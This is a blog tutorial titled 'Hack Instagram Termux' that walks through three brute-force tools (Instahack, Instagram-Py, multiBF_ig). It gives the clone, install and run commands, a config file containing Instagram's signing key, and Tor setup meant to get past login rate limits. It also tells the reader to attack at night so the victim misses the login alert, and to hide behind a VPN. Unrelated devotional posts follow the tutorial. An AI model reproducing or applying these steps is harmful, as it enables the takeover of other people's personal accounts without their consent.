Skip to main content

Hack Instagram Termux with Latest Instahack Script

🔰Hack Instagram termux with Instahack script 2020🔰

✨ In this tutorial i will explain you how to hack instagram account and also i will tell two methods to hack instagram 



In this tutorial we will use an Instagram hack script called INSTAHACK. This script uses the Bruteforce program.
Brute force is a program to break password combinations by entering / trying to password list one by one to the hacked account.
Before going to the tutorial, please download the termux application in Playstore (the latest version).
If you are still beginners, you should first learn how to use Termux so that you can follow this tutorial properly.
Then all you have to do is install the install script and run it in the Termux application. For more details, here’s how to hack Instagram using the Instagram script.
How to hack Instagram using Linux scripts
A little picture for this instaha feature, you can create a password list or register your own password. For default there are only a few passwords.
In this Instagram hack script we only need to enter the target Instagram ID. Then give a delay to the Bruteforce pause and finally wait for the results of the Bruteforce process.
For more details, please follow the steps below.
Step 1: install the Instagram hack script into Termux
We only need to clone from github to install this insta script. To install it we can use the following command.
apt update && apt upgrade

pkg install bash

pkg install python2

pkg install nano

pkg install git

pip2 install requests

pip2 install mechanize

git clone https://github.com/storiku/instahack
Wait until the installation process is complete …
When done, try entering the ls (eL eS) command then press enter on the keyboard. Make sure there is a folder called (in blue).
Step 2: run the Instahack script
To run this script the first step is to open the directory folder. Use the command
cd instahack
Then run this script with the command.
bash ig.sh
Then you will enter the hack stage. Please see step 3 for guidance.
Step 3: Add a wordlist and start Cracking
To add to the wordlist, you can choose option 1 (TXT password). Next add the password combination that you think the victim uses.
After writing the password, press ctrl + x then there will be a Save modified buffer notification? Just press y then enter on the keyboard.
After adding to the wordlist, just select option 3 (Direct Crack).
# Enter your target hack ig username, then enter
# Use Proxy (y / n), just select n (y is also allowed)
# Delay:? Just write 4
Then this script will perform Bruteforce to the target Ig account. Wait until the process is complete. When finished, the victim’s Ig username and password will appear.
The duration of this process depends on how many passwords you write down. The more passwords the longer the process.
Erore tips and solutions
There are a few tips from us for this termux Instagram hack tutorial. Here are some tips you can use.
# do this hacked ig process at night
The reason is, if one of the passwords that we created was successful. Then Instagram will automatically send an email notification to the account that we hacked.
The email contains a new login attempt from a python device.
Therefore you should do this method of instagram hacking at night or when the victim does not access his cellphone.
# Make an accurate password combination
The expertise to create a password is not owned by everyone.
# Use VPN
If you choose to use a proxy, you should activate / use VPN to reduce the occurrence of erore.
# Error because account activates 2-step authentication
On Instagram there is a 2-step authentication feature. Its function is for multiple security. So if there is a login to the account (the person who is logged in) must enter the authentication code sent from the Instagram.
Because this script uses python, an error will occur.
If there is an error as above, then the password before the erore occurs is the password used by the account.
Hack Instagram Account with the Instagram-Py Brute Force Tool
Instagram-Py is a simple python script to perform basic brute force attack against Instagram, this script can bypass login limiting on wrong passwords, so basically it can test infinite number of passwords. Instagram-Py is proved and can test over 6M passwords on a single instagram account with less resource as possible. This script mimics the activities of the official instagram android app and sends request over tor so you are secure, but if your tor installation is misconfigured then the blame is on you.
Depends on
python3
tor
requests
requests[socks]
stem
Installation
using pip to get Instagram-py
Make sure you have got the latest version of pip(>= 9.0 and python(>= 3.6)
$ sudo easy_install3 -U pip # you have to install python3-setuptools , update pip
$ sudo pip3 install requests --upgrade
$ sudo pip3 install requests[socks]
$ sudo pip3 install stem
$ sudo pip3 install instagram-py
$ instagram-py # installed successfully
$ # Now lets copy the config file to your hard drive!
$ wget -O ~/instapy-config.json "https://git.io/v5DGy"
Configuring Instagram-Py
Open your configuration file found in your home directory, this file is very important located at ~/instapy-config.json, do not change anything except tor configuration
$ vim ~/instapy-config.json # open it with your favorite text editior!
{
"api-url" : "https://i.instagram.com/api/v1/",
"user-agent" : "Instagram 10.26.0 Android (18/4.3; 320dp..... ",
"ig-sig-key" : "4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178",
"ig-sig-version" : "4",
"tor" : {
"server" : "127.0.0.1",
"port" : "9050",
"protocol" : "socks5",
"control" : {
"password" : "",
"port" : "9051"
}
}

}
api-url: do not change this unless you know what you are doing
user-agent: do not change this unless you know your stuff
ig-sig_key: never change this unless new release, this is extracted from the instagram apk file
tor: change everything according to your tor server configuration, do not mess up!
Configuring Tor server to open control port
open your tor configuration file usually located at /etc/tor/torrc
$ sudo vim /etc/tor/torrc # open it with your text editor
search for the file for this specific section
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
#ControlPort 9051
uncomment ‘ControlPort’ by deleting the # before ‘ControlPort’, now save the file and restart your tor server
now you are ready to crack any instagram account, make sure your tor configuration matched ~/instapy-config.json
Usage
Finally, now you can use instagram-py!
$ instagram-py your_account_username path_to_password_list
Github
https://github.com/getsecnow/instagram-py
Hack instagram using multiBF_ig in termux
Hack Instagram this time, we use the Brute Force method, which is a hack method using a random password or password, this hack method is quite powerful and most likely successful, because it uses a random word password that is often used by people. Incidentally this time we will use Multi Brute Force Instagram so we can brute force many accounts at once.

Before going to the tutorial, if you don’t have the latest Termux application, please download it first:
Ok, let’s get to the tutorial on How to Hack Instagram with Termux.
Open your Termux application.
Perform updates and upgrades using the command:
pkg update && pkg upgrade
After that, install git and jq using the following command:
pkg install git && apt install jq -y
Clone or download the Instagram hack script, using the command:
git clone https://github.com/noolep/multiBF_ig
Enter the MultiBF_ig directory, using the command:
cd multiBF_ig
Run the hack script, using the following command:
bash brute.sh
After that, you will be presented with several options or menus, you just select one.
Here I will choose option number 1, namely Get Target From Specific @Username, if you choose, you just type the option number, for example, here I choose one means we write number 1, then just click enter.
After that if you choose number one, you will be told to fill in the query and also the password that will be used to route the force. Query here you fill in the username that you want to brute for example diana means later the target is an account with a username that has the word diana, if already filled in you click enter. Now for the password, you fill in the password that people often use for example diana123, if you click enter to start the Instagram hack.
If someone is hacked, You Get It! Will appear, well if it appears like that you just need to log in using the account username and then with the password you wrote earlier.
Okay guys, now we have learned how to hack Instagram along with the tips. Hope it can be useful.

---chandan

Comments

  1. https://instagram.com/lina.lavari_82?igshid=kzwhwilb90g

    ReplyDelete
  2. https://instagram.com/lina.lavari_82?igshid=kzwhwilb90g

    ReplyDelete

Post a Comment

Popular posts from this blog

Three Lord Krishna thoughts

  Lord Krishna🚩 #1 Love, kindness, compassion and tolerance are qualities common to all the great religions, and whether or not we follow any particular religious tradition, the benefits of love and kindness are obvious to anyone.  à¤ª्रेम, दया, करुणा आणि सहिष्णुता हे सर्व महान धर्मांमध्ये सामान्य गुण आहेत आणि आपण कोणत्याही विशिष्ट धार्मिक परंपरेचे पालन करतो की नाही, प्रेम आणि दयाळूपणाचे फायदे कोणालाही स्पष्ट आहेत................... #GODKRISHANA #2 Our day-to-day existence is very much alive with hope, although there is no guarantee of our future. There is no guarantee that tomorrow at this time we will be here. But still we are working for that purely on the basis of hope. So, we need to make the best use of our time. आपले भविष्यातील कोणतीही हमी नसली तरी आपले दररोजचे अस्तित्व आशेने खूपच जिवंत आहे.  उद्या या वेळी आपण येथे आहोत याची शाश्वती नाही.  परंतु तरीही आम्ही त्यासाठी आशेच्या आधारे कार्य करीत आहोत.  तर, आपल्या वेळेचा योग्य वापर करणे आवश्यक आहे............. #GODKRISHNA #3 An effecti

Lord Shiva Playing Rudra Veena

Rudra veena (also spelled Rudra vina, and also called BÄ«n in North India), is a large plucked string instrument, originating from the Indian subcontinent, used in Hindustani classical music, one of the major types of veena played in Indian classical music.                Rudra Veena                            à¤°ुद्र विना It has a long tubular body made of wood or bamboo with a length between 54 and 62 inches. Two large, round resonators, made of dried and hollowed gourds, are attached under the tube. Twenty-four brass-fitted raised wooden frets are fixed on the tube with the help of wax. There are 4 main strings and 3  chikari  strings. As  Rudra  is a name for the Hindu god  Shiva ,  rudra vina  literally means "the veena dear to  Shiva ". Shiva is also said to have created the Rudra veena, inspired by his wife, Parvati. It is an ancient instrument rarely played today. The  rudra veena  declined in popularity in part due to the introduction in the early 19th century of the  s